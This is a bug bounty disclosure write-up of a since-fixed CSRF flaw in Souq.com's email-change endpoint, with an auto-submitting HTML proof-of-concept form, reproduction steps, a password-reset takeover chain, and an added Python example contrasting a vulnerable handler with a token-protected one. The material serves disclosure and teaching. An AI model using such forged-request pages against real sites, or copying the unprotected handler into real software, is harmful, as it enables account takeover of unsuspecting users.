Account Takeover of All Souq.com users by Adding new Email(CSRF)

Hi All,

Company Info :
Souq.com is an English-Arabic language e-commerce platform, often described as the Amazon of the Middle East. It is the largest e-commerce platform in the Arab world. On March 28, 2017, Amazon.com Inc. confirmed it would be acquiring Souq.com for $580 million.

Bug Category and reference links :
Cross-Site Request Forgery (CSRF)
Link: https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Technical Details of the Bug :
CSRF takes advantage of the fact that most web apps let an attacker predict all the details of a particular action (endpoint, method and parameter names).
Because browsers send credentials like session cookies automatically, an attacker can build a malicious web page that generates forged requests which are indistinguishable, to the server, from legitimate ones.

Detection of CSRF flaws is fairly easy via penetration testing or code analysis.
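To make the mechanism concrete, the following added example (written for this page, not code from Souq.com or from the original report) models the saveEmail endpoint twice: once in the unprotected shape the PoC below relies on, and once hardened with a per-session synchronizer token plus an Origin check. The session store, cookie value, token and request objects are all constructed stand-ins; the real endpoint's internals are not known.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed sample state: one logged-in victim session and the CSRF token
# a hardened site would have minted for that session when rendering its form.
SITE_ORIGIN = "https://sell.souq.com"
SESSIONS = {
    "victim-session-cookie": {"user": "victim", "email": "victim@example.com"},
}
CSRF_TOKENS = {
    "victim-session-cookie": secrets.token_urlsafe(32),
}


@dataclass
class Request:
    """Minimal stand-in for an HTTP POST as the server sees it (hypothetical)."""
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def save_email_vulnerable(req: Request) -> tuple[int, str]:
    """The behaviour a CSRF PoC relies on: any POST that carries the victim's
    session cookie is accepted, regardless of which page sent it."""
    session = SESSIONS.get(req.cookies.get("session"))
    if session is None:
        return 401, "not logged in"
    session["email"] = req.form["email"]
    return 200, "email updated"


def save_email_hardened(req: Request) -> tuple[int, str]:
    """Synchronizer-token pattern plus an Origin check. The attacker's page can
    make the browser attach the cookie, but it cannot read the per-session
    token (same-origin policy) and cannot forge the browser-set Origin header."""
    session_id = req.cookies.get("session")
    session = SESSIONS.get(session_id)
    if session is None:
        return 401, "not logged in"

    # Browsers add Origin to cross-site POSTs; reject anything not from our site.
    # A missing Origin is not treated as trusted: the token check still applies.
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"

    # The token was embedded in the legitimate form; compare in constant time.
    expected = CSRF_TOKENS.get(session_id, "")
    supplied = req.form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"

    session["email"] = req.form["email"]
    return 200, "email updated"


def forged_request() -> Request:
    """What an attacker-hosted auto-submitting form produces when the logged-in
    victim loads it: the browser adds the session cookie and the attacker's
    Origin, but the attacker cannot supply the victim's token."""
    return Request(
        headers={"Origin": "https://attacker.example"},
        cookies={"session": "victim-session-cookie"},
        form={"email": "attacker@example.com"},
    )


def legitimate_request() -> Request:
    """The same POST sent from the site's own profile-completion page."""
    return Request(
        headers={"Origin": SITE_ORIGIN},
        cookies={"session": "victim-session-cookie"},
        form={"email": "new@example.com",
              "csrf_token": CSRF_TOKENS["victim-session-cookie"]},
    )


if __name__ == "__main__":
    print(save_email_hardened(forged_request()))      # (403, ...)
    print(save_email_hardened(legitimate_request()))  # (200, 'email updated')
    print(save_email_vulnerable(forged_request()))    # (200, 'email updated')
```

The vulnerable handler only asks "is there a valid session cookie?", which the victim's browser answers for the attacker. The hardened handler additionally asks for a secret the attacker's origin cannot obtain, which is the property a real fix (synchronizer token, or a SameSite cookie combined with an Origin check) has to provide.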


About :
It was last September, when Souq.com was a private program on HackerOne. I started working on Souq.com and found that the site was vulnerable to CSRF attacks on many different actions. This was one of the critical actions, which led to takeover of the account of any user of Souq.com.


HTML POC :
<html>
<body>
<!-- Cross-site form targeting the saveEmail action. The victim's browser attaches
     the Souq.com session cookie itself; the attacker only chooses the email value. -->
<form action="https://sell.souq.com/profile-completion/saveEmail" method="POST">
<input type="hidden" name="email" value="[Valid_email]">
<input type="submit">
</form>
<!-- Submit automatically when the page loads so no click from the victim is needed. -->
<script>document.forms[0].submit();</script>
</body>
</html>


Steps to reproduce :
1. Log in to Souq.com as the victim in your browser (the PoC relies on the session cookie being sent automatically).
2. Change the "email" POST parameter to any email address that has not already been used on Souq.com.
3. Save the HTML above as a .html file and open it in the same browser.
4. You will notice that the new email address has been added to the victim's account.

Browser and Version :
Google Chrome
Version: 52.0.2743.116

Impact :
The saveEmail action attaches the new address to the victim's account with no confirmation from the victim, so once the attacker has added an email he controls, he can go to the forgot-password page and request a reset for that newly added address. The attacker then sets a new password from his own mailbox and takes over the victim's account, without ever knowing the original password.



Timeline :
September 4th : Report sent to the Souq.com security team through HackerOne
September 28th : Report triaged by the team
September 30th : $1000 bounty rewarded
Feb 2nd : The issue was resolved





I would like to thank the Souq.com team for fixing this serious issue.
Please feel free to comment if you have any questions regarding this issue.


Thanks !
Vijay Kumar
